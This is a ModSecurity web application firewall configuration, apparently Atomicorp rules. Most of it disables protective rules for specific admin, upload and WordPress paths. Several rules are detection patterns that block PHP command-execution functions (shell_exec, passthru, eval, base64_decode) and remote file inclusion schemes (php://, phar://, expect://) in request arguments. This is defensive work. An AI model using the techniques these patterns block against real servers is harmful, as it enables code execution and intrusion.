SecRule REQUEST_FILENAME "/modules/news/nav\.php" "phase:2,id:91937,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340029,ctl:ruleRemovebyID=340016"

SecRule REQUEST_FILENAME "/addnews\.php" "phase:2,id:91938,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/administrator/postarticles\.php" "phase:2,id:91939,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/administrator/contactus\.php" "phase:2,id:91940,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/administrator/homepagecontent\.php" "phase:2,id:91941,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/filebrowser/umifilebrowser\.html" "phase:2,id:91942,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=347008"

SecRule REQUEST_FILENAME "/coupons_exclusions\.php" "phase:2,id:91943,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390707"

SecRule REQUEST_FILENAME "/wp-content/plugins/voltrank" "phase:2,id:91944,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/admin_configvalues\.php" "phase:2,id:91945,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/processaddeditproduct\.php" "phase:2,id:91946,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/eecms\.php" "phase:2,id:91947,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=380026,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=340029,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=390572"

SecRule REQUEST_FILENAME "/builder/postsitedata\.php" "phase:2,id:91948,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/settingsgeneralaction\.php" "phase:2,id:91949,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/wp-comments-post\.php" "phase:2,id:91950,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/include/load_page\.php" "phase:2,id:91951,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=340145"

SecRule REQUEST_FILENAME "/profile/shopsettings\.jsf" "phase:2,id:91952,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/multimediasave\.do" "phase:2,id:91953,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340006"

SecRule REQUEST_FILENAME "/business_profile_engine\.php" "phase:2,id:91954,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/jupgrade/administrator/index\.php" "phase:2,id:91955,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/v2_configvars_engine\.php" "phase:2,id:91956,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/bookingcalendar/php/save\.php" "phase:2,id:91957,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/wizard/start\.php" "phase:2,id:91958,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/mailtemplateeditaction\.php" "phase:2,id:91959,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/admin/settingscontact\.php" "phase:2,id:91960,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/property-edit\.php" "phase:2,id:91961,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/server/webissues/handler\.php" "phase:2,id:91962,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=390904"

SecRule REQUEST_FILENAME "/admin/db_edit\.php" "phase:2,id:91963,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=380026,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/index\.php/datafeedmanager/adminhtml_datafeedmanager/save" "phase:2,id:91964,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340095"

SecRule REQUEST_FILENAME "/venue-edit\.php" "phase:2,id:91965,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=380026,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=340145"

SecRule REQUEST_FILENAME "/cms-setup/" "phase:2,id:91966,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=380026,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=340145"

SecRule REQUEST_FILENAME "/wp-admin/theme-install\.php" "phase:2,id:91967,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/admin/products_add\.php" "phase:2,id:91968,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=380026,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=340145"

SecRule REQUEST_FILENAME "/admin/story_uploader\.php" "phase:2,id:91969,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=380026,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=340145"
SecAction "phase:2,id:91970,t:none,pass,nolog,skipAfter:END_RULES_91970"

SecRule ARGS|!ARGS:/comment/|!ARGS:problem|!ARGS:resolution|!ARGS:subject|!ARGS:/body/|!ARGS:/^widget-section/|!ARGS:/template/|!ARGS:/^eip_/|!ARGS:/sql/|!ARGS:prefix|!ARGS:/keyword/|!ARGS:/msg/|!ARGS:metadata|!ARGS:post_content|!ARGS:parent_name|!ARGS:topic|!ARGS:file_content|!ARGS:/^serendipity/|!ARGS:comment|!ARGS:summary|!ARGS:configoptionname|!ARGS:Definition|!ARGS:/php/|!ARGS:/Metatags/|!ARGS:/footerfile/|!ARGS:/layout/|!ARGS:/message/|!ARGS:email|!ARGS:/desc/|!ARGS:body|!ARGS:/text/|!ARGS:/txt/|!ARGS:content "(?:\(chr ?\( ?[0-9]{1,3} ?\)| ?= ?f(?:open|write) ?\(|(?:passthru|php_uname|phpinfo|shell_exec|preg_\w+|mysql_query|exec|eval|create_function|base64_decode|decode_base64) ?\()" 	"phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase,capture,id:344195,rev:33,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  PHP function in Argument - this may be an attack.',logdata:'%{TX.0}'"

SecMarker END_RULES_91970

SecRule REQUEST_FILENAME "/include/ajax_price\.php" "phase:2,id:91971,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=340145"

SecRule REQUEST_FILENAME "/page_editor/save_page\.php" "phase:2,id:91972,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/admin/story_prosess\.php" "phase:2,id:91973,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=380026,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=340145"
SecAction "phase:2,id:91974,t:none,pass,nolog,skipAfter:END_RULES_91974"

SecRule ARGS|!ARGS:/comment/|!ARGS:problem|!ARGS:resolution|!ARGS:subject|!ARGS:/body/|!ARGS:/^widget-section/|!ARGS:/template/|!ARGS:/^eip_/|!ARGS:/sql/|!ARGS:prefix|!ARGS:/keyword/|!ARGS:/msg/|!ARGS:metadata|!ARGS:post_content|!ARGS:parent_name|!ARGS:topic|!ARGS:file_content|!ARGS:/^serendipity/|!ARGS:comment|!ARGS:summary|!ARGS:configoptionname|!ARGS:Definition|!ARGS:/php/|!ARGS:/Metatags/|!ARGS:/footerfile/|!ARGS:/layout/|!ARGS:/message/|!ARGS:email|!ARGS:/desc/|!ARGS:body|!ARGS:/text/|!ARGS:/txt/|!ARGS:content "(?:\(chr ?\( ?[0-9]{1,3} ?\)| ?= ?f(?:open|write) ?\(|(?:passthru|php_uname|phpinfo|shell_exec|preg_\w+|mysql_query|exec|eval|create_function|base64_decode|decode_base64) ?\()" 	"phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase,capture,id:344196,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  PHP function in Argument - this may be an attack.',logdata:'%{TX.0}'"

SecMarker END_RULES_91974

SecRule REQUEST_FILENAME "/admin/story_process\.php" "phase:2,id:91975,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=380026,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=340145"
SecAction "phase:2,id:91976,t:none,pass,nolog,skipAfter:END_RULES_91976"

SecRule ARGS|!ARGS:/comment/|!ARGS:problem|!ARGS:resolution|!ARGS:subject|!ARGS:/body/|!ARGS:/^widget-section/|!ARGS:/template/|!ARGS:/^eip_/|!ARGS:/sql/|!ARGS:prefix|!ARGS:/keyword/|!ARGS:/msg/|!ARGS:metadata|!ARGS:post_content|!ARGS:parent_name|!ARGS:topic|!ARGS:file_content|!ARGS:/^serendipity/|!ARGS:comment|!ARGS:summary|!ARGS:configoptionname|!ARGS:Definition|!ARGS:/php/|!ARGS:/Metatags/|!ARGS:/footerfile/|!ARGS:/layout/|!ARGS:/message/|!ARGS:email|!ARGS:/desc/|!ARGS:body|!ARGS:/text/|!ARGS:/txt/|!ARGS:content "(?:\(chr ?\( ?[0-9]{1,3} ?\)| ?= ?f(?:open|write) ?\(|(?:passthru|php_uname|phpinfo|shell_exec|preg_\w+|mysql_query|exec|eval|create_function|base64_decode|decode_base64) ?\()" 	"phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase,capture,id:344296,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  PHP function in Argument - this may be an attack.',logdata:'%{TX.0}'"

SecMarker END_RULES_91976

SecRule REQUEST_FILENAME "/seopanel/login\.php" "phase:2,id:91977,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"

SecRule REQUEST_FILENAME "/doku\.php" "phase:2,id:91978,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340095"

SecRule REQUEST_FILENAME "/shopperpress/ppt/ajax/actions\.php" "phase:2,id:91979,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/wp-content/plugins/spostarbust/images/index\.php" "phase:2,id:91980,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"

SecRule REQUEST_FILENAME "/emailxmlasattachment\.ph" "phase:2,id:91981,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/console/manage_products\.php" "phase:2,id:91982,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/agents/uploader/doupload\.php" "phase:2,id:91983,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=380006,ctl:ruleRemovebyID=380007"

SecRule REQUEST_FILENAME "/wp-load\.php" "phase:2,id:91984,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=380026,ctl:ruleRemovebyID=340094,ctl:ruleRemovebyID=390715"

SecRule REQUEST_FILENAME "/textpattern/index\.php" "phase:2,id:91985,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"

SecRule REQUEST_FILENAME "/filemanager/filemanager\.php" "phase:2,id:91986,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"

SecRule REQUEST_FILENAME "/imagecrop\.php" "phase:2,id:91987,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
SecAction "phase:2,id:91988,t:none,pass,nolog,skipAfter:END_RULES_91988"


SecRule REQUEST_URI|ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/file/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"           "phase:2,deny,log,auditlog,status:403,capture,id:336633,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (AE)',logdata:'%{TX.0}',chain"
SecRule MATCHED_VAR "!@beginsWith http:/%{SERVER_NAME}/"

SecRule REQUEST_URI|ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/file/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  	"phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:336634,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (MM)',logdata:'%{TX.0}',chain"
SecRule MATCHED_VAR "!@beginsWith http:/%{SERVER_NAME}/"


SecMarker END_RULES_91988

SecRule REQUEST_FILENAME "/dashboard\.php" "phase:2,id:91989,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/ie-style\.php" "phase:2,id:91990,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340021"

SecRule REQUEST_FILENAME "/plugins/likebox\.php" "phase:2,id:91991,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/bb_gate\.php" "phase:2,id:91992,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/imgprod\.php" "phase:2,id:91993,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/phpmyvisites\.php" "phase:2,id:91994,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/admin/editpage\.php" "phase:2,id:91995,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"

SecRule REQUEST_FILENAME "/modules/mod_ajax_contact/ajax\.php" "phase:2,id:91996,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390703"

SecRule REQUEST_FILENAME "/admin/artwork/index/upload_file" "phase:2,id:91997,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=380006"

SecRule REQUEST_FILENAME "/admin/media/upload\.php" "phase:2,id:91998,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"

SecRule REQUEST_FILENAME "/php-stats\.php" "phase:2,id:91999,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/a_config_dt\.php" "phase:2,id:92000,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"

SecRule REQUEST_FILENAME "/aom/item/index\.php" "phase:2,id:92001,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340165"

SecRule REQUEST_FILENAME "/orders/ordersave\.php" "phase:2,id:92002,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=390572"

